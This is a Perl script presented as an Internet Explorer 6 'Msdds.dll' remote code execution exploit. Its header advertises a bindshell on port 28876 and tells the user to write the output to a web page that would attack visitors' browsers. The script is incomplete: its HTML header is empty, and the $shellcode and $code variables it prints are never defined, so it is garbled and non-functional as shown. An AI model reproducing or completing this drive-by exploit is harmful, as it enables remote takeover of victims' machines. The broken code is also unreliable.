####################################################### # # Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day) # # Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous # # PoC code ripped from Berend-Jan Wever's Internet-Exploiter # # Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll) # # Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2) # # Code usage : perl IE-Msddsdll-0day.pl > mypage.html # ####################################################### # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2, 1991 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # A copy of the GNU General Public License can be found at: # http://www.gnu.org/licenses/gpl.html # or you can write to: # Free Software Foundation, Inc. # 59 Temple Place - Suite 330 # Boston, MA 02111-1307 # USA. # ####################################################### # header my $header = "
\n\n"; # Msdds.dll my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'; # footer my $footer = "\n". "Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin print "$header $shellcode $code $footer";